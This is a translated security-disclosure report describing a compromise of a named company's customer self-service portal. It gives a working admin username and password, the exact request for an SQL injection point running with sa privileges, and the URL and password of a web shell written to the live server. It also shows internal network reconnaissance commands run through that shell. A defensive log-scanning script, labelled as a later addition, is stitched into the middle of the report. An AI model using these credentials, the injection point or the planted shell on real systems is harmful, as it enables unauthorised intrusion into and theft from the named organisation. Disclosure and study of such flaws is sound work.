### Brief description:
Weak password, SQL injection, getshell
### Details:
System address:
http://vip.ufida.com.cn/Frame/Index.aspx
![QQ截图20151021162136.jpg](https://images.seebug.org/upload/201510/211621187861fbd42f94e62a918639c6421ddce5.jpg)
Weak-password account: adminnc
Password: adminnc
![QQ截图20151021162437.jpg](https://images.seebug.org/upload/201510/21162318d4fb4043dcf5f3c510b9cd10affaa228.jpg)
An injection point was found in the self-service query function (login required; note that the cookie expires):
![QQ截图20151021162521.jpg](https://images.seebug.org/upload/201510/211624159e5956a880d0a2fd338d8469b81bb8da.jpg)
```
GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://vip.ufida.com.cn/RepositorySearchInfo/DoctList.aspx?Type=MainPageClick
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: vip.ufida.com.cn
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=szvzcr45nfresnqlzjhbtsqe
```
![QQ截图20151021163123.jpg](https://images.seebug.org/upload/201510/21163040a9dc633bdb22d377d6fcb5ee476f63d3.jpg)
UNION queries are supported
The database connection runs with sa privileges
![QQ截图20151021163229.jpg](https://images.seebug.org/upload/201510/211631126e092dde0a40298cfb73321672cc5f60.jpg)
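
A detection check for the injection point described above, as an added example that is not part of the original report: it scans IIS-style access log lines for requests to `DoctInfo.aspx` whose `ReposID` is anything other than a single canonical GUID. The log field order, the sample lines and the function name `suspicious_requests` are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Path and parameter come from the request in the report; matching is
# case-insensitive because IIS/ASP.NET treat both that way.
TARGET_PATH = "/repositorysearchinfo/doctinfo.aspx"
PARAM = "reposid"
# Canonical hyphenated GUID, the only value shape the legitimate request uses.
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample lines (not real traffic). Assumed W3C field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-10-21 08:21:36 203.0.113.10 GET /RepositorySearchInfo/DoctInfo.aspx ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f 200
2015-10-21 08:22:01 203.0.113.77 GET /RepositorySearchInfo/DoctInfo.aspx ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f'+UNION+SELECT+NULL-- 500
2015-10-21 08:22:05 203.0.113.77 GET /RepositorySearchInfo/DoctInfo.aspx ReposID=38d4a08e%2D8b79%2D4de7%2D8566%2D30aecfb1d56f%27 500
2015-10-21 08:23:10 203.0.113.10 GET /Frame/Index.aspx - 200
2015-10-21 08:23:15 203.0.113.10 GET /RepositorySearchInfo/DoctInfo.aspx - 200
"""


def suspicious_requests(log_text):
    """Return (client_ip, decoded_value, status) for each non-GUID ReposID."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        client, stem, query, status = fields[2], fields[4], fields[5], fields[6]
        if stem.lower() != TARGET_PATH:
            continue
        # parse_qsl percent-decodes, so encoded quotes are seen as quotes.
        values = [v for k, v in parse_qsl(query, keep_blank_values=True)
                  if k.lower() == PARAM]
        if not values:
            continue  # parameter absent: nothing from this field reaches SQL
        # Flag repeated parameters and any value that is not exactly one GUID.
        if len(values) > 1 or not GUID_RE.fullmatch(values[0]):
            findings.append((client, " | ".join(values), status))
    return findings


if __name__ == "__main__":
    for client, value, status in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} ReposID={value!r}")
```

The same allowlist, applied in the page handler before the value is bound to a parameterized query, closes the injection point rather than only detecting it.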
 
### Proof of vulnerability:
![QQ截图20151021163307.jpg](https://images.seebug.org/upload/201510/2116314633f6808a598ed29377292914f5986e33.jpg)
The internal network is reachable
![QQ截图20151021163526.jpg](https://images.seebug.org/upload/201510/21163420d35370b813ab3b64f84fb590a378a40c.jpg)
![QQ截图20151021164007.jpg](https://images.seebug.org/upload/201510/2116385293629987903b8e225330ae534e8a1c62.jpg)
After locating the web root path, a shell was written:
```
http://vip.ufida.com.cn/wooyun.aspx
```
Password: wpp
![QQ截图20151021164403.jpg](https://images.seebug.org/upload/201510/211642425968ea9a3abd7c42f933dd1fa7988c26.jpg)
With UNION support, this goes quickly
```
D:\E_data\战略客户自助系统网站\wwwroot\> arp -a
```
![QQ截图20151021164507.jpg](https://images.seebug.org/upload/201510/2116434740416d223331d5c2dc8e640128cf0d0d.jpg)
![QQ截图20151021164542.jpg](https://images.seebug.org/upload/201510/2116442210f8474195d5d9afddc31b5795c40a87.jpg)
```
D:\E_data\战略客户自助系统网站\wwwroot\> net view
服务器名称            注释
-------------------------------------------------------------------------------
命令成功完成。
```